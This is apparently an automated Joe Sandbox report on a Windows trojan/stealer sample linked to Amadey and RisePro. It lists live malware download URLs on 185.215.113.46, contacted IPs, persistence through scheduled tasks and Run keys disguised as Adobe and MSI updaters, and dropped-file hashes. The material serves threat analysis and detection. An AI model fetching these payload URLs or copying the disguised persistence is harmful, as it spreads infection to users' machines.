                                                                                                        https://ipinfo.io/widget/demo/191.96.227.222I2jCDr35mu.exe, 00000000.00000002.2713747827.0000000000F21000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000002.2713747827.0000000000F4B000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.3345445002.00000000013E0000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2506172514.000000000140A000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.3345445002.000000000140A000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.3220691052.0000000001430000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.3220691052.0000000001491000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000008.00000002.2348896426.0000000000F6A000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000008.00000002.2348896426.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.2653472132.00000000010D0000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.2653472132.00000000010AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://185.215.113.46/cost/ladas.exeppDataMPGPH131.exe, 00000006.00000002.3345445002.0000000001485000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.3266538532.0000000001485000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • 15%, Virustotal, Browse
                                                                                                          • Avira URL Cloud: malware
                                                                                                          unknown
                                                                                                          https://duckduckgo.com/?t=ffab&q=firefox.exe, 00000024.00000003.2680917978.0000015462217000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://185.215.113.46/mine/plaza.exeMPGPH131.exe, 00000006.00000002.3401083597.00000000062BE000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.3345445002.00000000013FA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.3402572267.0000000006396000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.3220691052.0000000001491000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000008.00000002.2348896426.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.2653472132.0000000001124000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • 23%, Virustotal, Browse
                                                                                                            • Avira URL Cloud: malware
                                                                                                            unknown
                                                                                                            http://185.215.113.46/mine/amert.exe4I2jCDr35mu.exe, 00000000.00000003.2395591209.0000000005CD1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • 12%, Virustotal, Browse
                                                                                                            • Avira URL Cloud: malware
                                                                                                            unknown
                                                                                                            https://bugzilla.mozilla.org/show_bug.cgi?id=793869firefox.exe, 00000024.00000003.3223466540.000001546313E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                                                                                                                          142.250.65.206
                                                                                                                                          unknownUnited States
                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                          239.255.255.250
                                                                                                                                          unknownReserved
                                                                                                                                          unknownunknownfalse
                                                                                                                                          31.13.71.7
                                                                                                                                          unknownIreland
                                                                                                                                          32934FACEBOOKUSfalse
                                                                                                                                          142.251.32.110
                                                                                                                                          unknownUnited States
                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                          142.250.80.70
                                                                                                                                          unknownUnited States
                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                          20.75.60.91
                                                                                                                                          unknownUnited States
                                                                                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                          34.160.144.191
                                                                                                                                          unknownUnited States
                                                                                                                                          2686ATGS-MMD-ASUSfalse
                                                                                                                                          142.251.41.4
                                                                                                                                          unknownUnited States
                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                          142.250.65.202
                                                                                                                                          unknownUnited States
                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                          44.240.103.52
                                                                                                                                          unknownUnited States
                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                          34.117.186.192
                                                                                                                                          unknownUnited States
                                                                                                                                          139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                                                                                          74.125.8.74
                                                                                                                                          unknownUnited States
                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                          31.13.71.36
                                                                                                                                          unknownIreland
                                                                                                                                          32934FACEBOOKUSfalse
                                                                                                                                          142.250.176.202
                                                                                                                                          unknownUnited States
                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                          142.251.40.227
                                                                                                                                          unknownUnited States
                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                          142.251.40.106
                                                                                                                                          unknownUnited States
                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                          142.251.32.99
                                                                                                                                          unknownUnited States
                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                          142.250.176.206
                                                                                                                                          unknownUnited States
                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                          44.227.167.82
                                                                                                                                          unknownUnited States
                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                          44.237.193.248
                                                                                                                                          unknownUnited States
                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                          142.250.80.42
                                                                                                                                          unknownUnited States
                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                          142.251.40.225
                                                                                                                                          unknownUnited States
                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                          34.117.188.166
                                                                                                                                          unknownUnited States
                                                                                                                                          139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                                                                                          142.251.41.14
                                                                                                                                          unknownUnited States
                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                          142.251.32.100
                                                                                                                                          unknownUnited States
                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                          142.251.32.97
                                                                                                                                          unknownUnited States
                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                          13.226.34.9
                                                                                                                                          unknownUnited States
                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                          172.64.41.3
                                                                                                                                          unknownUnited States
                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                          74.125.3.138
                                                                                                                                          unknownUnited States
                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                          142.251.179.84
                                                                                                                                          unknownUnited States
                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                          142.250.176.196
                                                                                                                                          unknownUnited States
                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                          142.250.65.195
                                                                                                                                          unknownUnited States
                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                          142.251.40.238
                                                                                                                                          unknownUnited States
                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                          34.149.100.209
                                                                                                                                          unknownUnited States
                                                                                                                                          2686ATGS-MMD-ASUSfalse
                                                                                                                                          142.250.64.106
                                                                                                                                          unknownUnited States
                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                          34.107.243.93
                                                                                                                                          unknownUnited States
                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                          193.233.132.62
                                                                                                                                          unknownRussian Federation
                                                                                                                                          2895FREE-NET-ASFREEnetEUfalse
                                                                                                                                          142.250.80.98
                                                                                                                                          unknownUnited States
                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                          104.98.115.138
                                                                                                                                          unknownUnited States
                                                                                                                                          20940AKAMAI-ASN1EUfalse
                                                                                                                                          34.107.221.82
                                                                                                                                          unknownUnited States
                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                          142.250.64.102
                                                                                                                                          unknownUnited States
                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                          142.250.81.227
                                                                                                                                          unknownUnited States
                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                          35.244.181.201
                                                                                                                                          unknownUnited States
                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                          142.250.65.227
                                                                                                                                          unknownUnited States
                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                          23.40.179.47
                                                                                                                                          unknownUnited States
                                                                                                                                          16625AKAMAI-ASUSfalse
                                                                                                                                          142.250.81.234
                                                                                                                                          unknownUnited States
                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                          142.251.35.166
                                                                                                                                          unknownUnited States
                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                          142.250.176.195
                                                                                                                                          unknownUnited States
                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                          142.250.31.84
                                                                                                                                          unknownUnited States
                                                                                                                                          15169GOOGLEUSfalse
IP
192.168.2.6
127.0.0.1
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1396093
Start date and time:2024-02-21 12:28:07 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 12m 15s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:55
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:I2jCDr35mu.exe
renamed because original name is a hash value
Original Sample Name:758c5213c3ffebe919633188f8c07747.exe
Detection:MAL
Classification:mal100.troj.spyw.evad.winEXE@192/738@0/95
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 58%
• Number of executed functions: 113
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                          • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                          • Skipping network analysis since amount of network traffic is too extensive
Time | Type | Description
12:29:02 | Task Scheduler | Run new task: MPGPH131 HR path: C:\ProgramData\MPGPH131\MPGPH131.exe
12:29:02 | Task Scheduler | Run new task: MPGPH131 LG path: C:\ProgramData\MPGPH131\MPGPH131.exe
12:29:03 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RageMP131 C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
12:29:11 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RageMP131 C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
12:29:28 | API Interceptor | 231x Sleep call for process: I2jCDr35mu.exe modified
12:29:31 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV131 C:\Users\user\AppData\Local\AdobeUpdaterV131\AdobeUpdaterV131.exe
12:29:33 | Task Scheduler | Run new task: MSIUpdaterV131 HR path: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe
12:29:34 | Task Scheduler | Run new task: MSIUpdaterV131 LG path: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe
12:29:40 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV131 C:\Users\user\AppData\Local\AdobeUpdaterV131\AdobeUpdaterV131.exe
12:29:45 | Task Scheduler | Run new task: explorgu path: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
12:29:48 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS131.lnk
12:29:50 | API Interceptor | 373419x Sleep call for process: MPGPH131.exe modified
12:30:09 | API Interceptor | 80x Sleep call for process: idPXKSo93Tb9SEEu9e8w.exe modified
12:30:37 | API Interceptor | 1x Sleep call for process: firefox.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                  • 185.215.113.46
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                                                                                                                                  • 185.215.113.46
                                                                                                                                                                                  SecuriteInfo.com.Win32.TrojanX-gen.304.20057.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                                                                                                  • 185.215.113.46
                                                                                                                                                                                  MICROSOFT-CORP-MSN-AS-BLOCKUShttps://failteireland.sharepoint.com:443/:f:/s/PropertyandFacilities-AramarkTeam/EiTiccb6faFPiFmc0nLgpkUBupiwf9pcsfPXcpXQR5fZ6w?e=5%3aWuWZNq&at=9Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                  • 13.107.136.10
                                                                                                                                                                                  https://pocloudcentral.crm.powerobjects.net/PowerEmailWebsite//GetUrl2013.aspx?t=TEka9Gzp+UWz6rVgaDAhSUMAUgBNAA==&eId=03e02621-4ddf-eb11-8150-00155d010e03&pval=//wongterm%E3%80%82com/#DICNcGhpbGlwLnN0b2RkYXJkQG1hZ2FpcnBvcnRzLmNvbQ==??kypxg44fhlrkaixdobr=cGhpbGlwLnN0b2RkYXJkQG1hZ2FpcnBvcnRzLmNvbQ==/..=KyfV3Z&u=276b8dda4ef94158348d5b6b8&id=6b7205781dGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                                                                  • 23.99.128.52
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                                                                                                                                  • 13.107.21.200
                                                                                                                                                                                  Remittance_Summary#U00ae_INV0055BACS_.htmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 13.107.213.40
                                                                                                                                                                                  FjDBAYa3kD.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                  • 137.117.107.167
                                                                                                                                                                                  TzYWkBAZFE.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                  • 52.249.125.203
                                                                                                                                                                                  92OyrrVFOt.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                  • 20.251.99.81
                                                                                                                                                                                  pqne7ylplb.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                  • 20.130.139.175
                                                                                                                                                                                  SecuriteInfo.com.Win32.TrojanX-gen.137.30573.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                                                                                                                                  • 13.107.42.14
                                                                                                                                                                                  https://vk.com/away.php?to=https%3A%2F%2Fhhu.tmw.temporary.site%2Fwp-includes%2Fmyevri&post=809587144_14&cc_key=Get hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 204.79.197.203
                                                                                                                                                                                  No context
                                                                                                                                                                                  No context
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2328576
                                                                                                                                                                                  Entropy (8bit):7.963129291166755
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:49152:ov+pa5Mxg2VmKxuou1saUJ3iuL+y8g9Rdi8ZNaFwbdwUdUL:1pa5Mx9oKhaKdL+Lgo8ZoF0dw5L
                                                                                                                                                                                  MD5:758C5213C3FFEBE919633188F8C07747
                                                                                                                                                                                  SHA1:FA534E53D645F69D1C950D8FF17E11E877CA970B
                                                                                                                                                                                  SHA-256:B50BECDB79B109E85CAA4F588343FDD7E96152F4E23F40AD213A0336118BC87B
                                                                                                                                                                                  SHA-512:783CEE4A35DAB87271A126B8AE46F41E636FF9AFEB2DC5620723FED828C4C72F991127FF7B8FD1DE287CB8F63B825FE0EBEDA7585B66ACD1411B7050B2F1BDA9
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......C.........L.....L.....L.....H.G...H.....H.....H...R.L.....L.....L...............E.....-........Rich..................PE..L...N@.e...............".....L.......0Z...........@..........................`Z.......#...@.................................T...h....p..h1.......................................................................................................... . .`..........................@....rsrc...h1...p......................@....idata ............................@... ..,.........................@...awogigmw.P....?..D..................@...nkfwixkm..... Z......`#.............@....taggant.0...0Z.."...f#.............@...........................................................................................................................................................................................
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):26
                                                                                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1882112
                                                                                                                                                                                  Entropy (8bit):7.949517224812261
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:49152:wLi2wNaeFSEYrdH8UesU02hUv21QLUmRa2obb:oHnDEYrPW0cUvCmz+b
                                                                                                                                                                                  MD5:2C4C8C25D448625A0184403CA56EDB2D
                                                                                                                                                                                  SHA1:61531D43B5ADE8F66FD2409DF1A20902EF1A781E
                                                                                                                                                                                  SHA-256:01024AF50DDAF78F4F6A96B4E537400D4572A47E60CCF542F9EE6771DCDBAC0F
                                                                                                                                                                                  SHA-512:CCF51E10D1AAE0F669B771669F67500E1B7EE712A5078B947D256B57E722244F11F01B018820C4B53D1069137F5F4859E3353D8BE601F4E80AC1ECF939F30368
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*R..n3.@n3.@n3.@5[.A`3.@5[.A.3.@.^.A|3.@.^.Az3.@.^.A.3.@5[.Az3.@5[.A}3.@n3.@.3.@.].Ao3.@.]u@o3.@.].Ao3.@Richn3.@........................PE..L......e.............................@J...........@..........................pJ.....6.....@.................................Vp..j....`........................J...............................J..................................................... . .P..........................@....rsrc........`......................@....idata .....p......................@... ..*.........................@...tfywulqz......0.....................@...prpgnkkw.....0J.....................@....taggant.0...@J.."..................@...................................................................................................................................................................................................................
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):7528
                                                                                                                                                                                  Entropy (8bit):5.159137026830408
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:lABMiBd2cbhbVbTbfbRbObtbyEl7nKJA6unSrDtTZdxSofQ:CibcNhnzFSJ51nSrDhZdxE
                                                                                                                                                                                  MD5:BED1D8537E2E66E11D4A1E0F788BABA5
                                                                                                                                                                                  SHA1:AE59276119189B3D7852EC83D7D9ECC59F0472AC
                                                                                                                                                                                  SHA-256:D83B2A7D8AEC8CC7B8FF24A88C786CEE53F516B7391FDF8A0FD23C319C6B2905
                                                                                                                                                                                  SHA-512:6B1C1AE0108CA6DFA7F1E9824EC2CF7D6965810EEFB96E8C02795CB7D9E78B6996EFA645949665567C328A47FA73C3FFE20BF1AB80C77FF43D5754A57ABA692D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"type":"uninstall","id":"46742503-b71c-4880-baae-e12f5a511087","creationDate":"2024-02-21T12:44:56.450Z","version":4,"application":{"architecture":"x86-64","buildId":"20230927232528","name":"Firefox","version":"118.0.1","displayVersion":"118.0.1","vendor":"Mozilla","platformVersion":"118.0.1","xpcomAbi":"x86_64-msvc","channel":"release"},"payload":{"otherInstalls":0},"clientId":"7340e351-fad3-4a0f-b554-971fbfafe8fb","environment":{"build":{"applicationId":"{ec8030f7-c20a-464f-9b0e-13a3a9e97384}","applicationName":"Firefox","architecture":"x86-64","buildId":"20230927232528","version":"118.0.1","vendor":"Mozilla","displayVersion":"118.0.1","platformVersion":"118.0.1","xpcomAbi":"x86_64-msvc","updaterAvailable":true},"partner":{"distributionId":null,"distributionVersion":null,"partnerId":null,"distributor":null,"distributorChannel":null,"partnerNames":[]},"system":{"memoryMB":8191,"virtualMaxMB":134217728,"cpu":{"isWindowsSMode":false,"count":4,"cores":2,"vendor":"GenuineIntel","name":"I
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:modified
                                                                                                                                                                                  Size (bytes):44898
                                                                                                                                                                                  Entropy (8bit):6.095204755186144
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWXHi1zNtTDmNMahWz9KJDSgzMMd6qD47u3+Ciob:+/Ps+wsI7ynfmgKtSmd6qE7lFob
                                                                                                                                                                                  MD5:475969CAA3ABC3B87BBA8A06A26416EC
                                                                                                                                                                                  SHA1:1F0D12C224795390E1996FF32EFB38B826D05D32
                                                                                                                                                                                  SHA-256:E5251D710E1B5A6A7F2F56B3C0253ED7D56F144521190BB45A2C2BD119397B75
                                                                                                                                                                                  SHA-512:5FE095478DBBFDE8C4C96BA5377667647E7329DA927A1AA81941A49A69C305C66F6FBE62DF71CEAD702F09AB558652826CC142D1537A8DD6185E9830AAC81C0C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):45886
                                                                                                                                                                                  Entropy (8bit):6.092413418838823
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:3DXzgWPsj/qlGJqIY8GB4xKy4Zi1zNt2C9RaDQrbFDdPVFe3KJDSgzMMd6qD47uv:3/Ps+wsI7yOKAMKtSmd6qE7lFov
                                                                                                                                                                                  MD5:663922852B080F86C0AB00AEE929BBAD
                                                                                                                                                                                  SHA1:B827C2D43AA11C27CF94F6D0B7D4719E98643AE6
                                                                                                                                                                                  SHA-256:658277912E96925F1B631C3375E5A30398EE17CCE4C77A48D76BCB5939BC6A0F
                                                                                                                                                                                  SHA-512:D0ACDCD583C1A43581B37B7DF6735C280E35317DE18357D152D1D2A0ED02DF15E6E554D2CAFE425B908D720C51F5625ED2F99B40199005154D75C673EF73BD33
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                  Entropy (8bit):6.089793521976957
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWwdi1zNtPMPkzZ7okEt9r1JDSgzMMd6qD47u3+Ciob:+/Ps+wsI7ynQ0kzItSmd6qE7lFob
                                                                                                                                                                                  MD5:86BB2AEBE6542FECF0EE38A0E716C884
                                                                                                                                                                                  SHA1:BF3F38DD1B6B36C60F921CDB1B25E5AFFDE62175
                                                                                                                                                                                  SHA-256:A6B3CDCD85C26BAA92E40DE5B4DC338F7DF051BA1116685FE277ED35477392E0
                                                                                                                                                                                  SHA-512:434B38376BF139971C5AD7E9E190A7330D7BF3040EC4832341CD0F8FE570EA511D65018241C1B735C7A6DD3EA449CD7541B025BDF04C7961396344F12010E924
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):45888
                                                                                                                                                                                  Entropy (8bit):6.092481644253239
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:5DXzgWPsj/qlGJqIY8GB4xKBOpi1zNt2C6RaDQrbFDdPVFe3KJDSgzMMd6qD47uv:5/Ps+wsI7yOK1zKtSmd6qE7lFov
                                                                                                                                                                                  MD5:553D96DF72F739CE4A609991683B90E1
                                                                                                                                                                                  SHA1:78F7470F8E4B9EAE5518DC6F4B6D89AF532C1BB9
                                                                                                                                                                                  SHA-256:5163A41C631CCA370068EBE6E45F0D4C6F99BF8BBB7BDFB9C869741877960142
                                                                                                                                                                                  SHA-512:EC3789B79E064BAA24B0067E04C39B0E217F621E1FC14C7C9C2464A5C355EBCF1CE054954E8FC3E59D7BE78B97C40CF766053F706A65FFD16512B0767E684E3E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):45886
                                                                                                                                                                                  Entropy (8bit):6.092416626233074
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:3DXzgWPsj/qlGJqIY8GB4xKy1li1zNt2C9RaDQrbFDdPVFe3KJDSgzMMd6qD47uv:3/Ps+wsI7yOKDMKtSmd6qE7lFov
                                                                                                                                                                                  MD5:23E57DDF9B2D0E63C947E1A16FA37D40
                                                                                                                                                                                  SHA1:5BE1AE4A447D17A0712AB4D3897C3B745C874370
                                                                                                                                                                                  SHA-256:18D6611C69A7A950680D0ED1C9A99D331B40580BAFA3121275412FF51D178925
                                                                                                                                                                                  SHA-512:8957945C563109D5A91E61FA3CC698BF79856A61C392CE8FEB265B16EA20442F7D8BF47BDE2B8DE064AA17E54F40A280AA73DF58CA061D75EF8F3122B35095EB
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):44902
                                                                                                                                                                                  Entropy (8bit):6.095884668343846
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWNmi1zNt2CNoaLFQP9uKJDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynabKtSmd6qE7lFoC
                                                                                                                                                                                  MD5:63F3469CA792E17C27937C9F6982B83C
                                                                                                                                                                                  SHA1:2F18E896574CBE286F76F2142DF29A2FF08F9C0E
                                                                                                                                                                                  SHA-256:9D9DF2CBC69471290192A3FC50441758B6A7AB75E75504DB533D7F39C3637B82
                                                                                                                                                                                  SHA-512:259AA6D4AD784769334FA03451AE7CFB132D82078CB1A3E3E45032F530A565891F19EFBD7CCE7A43EF5A6125CDA6DFEE8F60A76C228AA6A3CFCDCBB311948B97
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):45886
                                                                                                                                                                                  Entropy (8bit):6.092381521136022
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:3DXzgWPsj/qlGJqIY8GB4xKy6Vi1zNt2C9RaDQrbFDdPVFe3KJDSgzMMd6qD47uv:3/Ps+wsI7yOKqMKtSmd6qE7lFov
                                                                                                                                                                                  MD5:C68941913EB28F0802D81D3E8FD1B4BF
                                                                                                                                                                                  SHA1:3F07B5201E791BCE310542BAD7CF6CC14016F40B
                                                                                                                                                                                  SHA-256:1858F8BED52352C8616CF53DAB33C97B8013E8E17D2C17A7DCC57EE4D412159C
                                                                                                                                                                                  SHA-512:A8FB8E40F0C3FB3360885DBDF4D5E1873BAE2FCCF6E0F88D3BD60E1288476C25F5DAC2704A04C4EC07A40B6F07B621ACF2CEDEB5DFFEF52A05D850B033F19DC0
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):45886
                                                                                                                                                                                  Entropy (8bit):6.0924155833428095
                                                                                                                                                                                  Encrypted:false
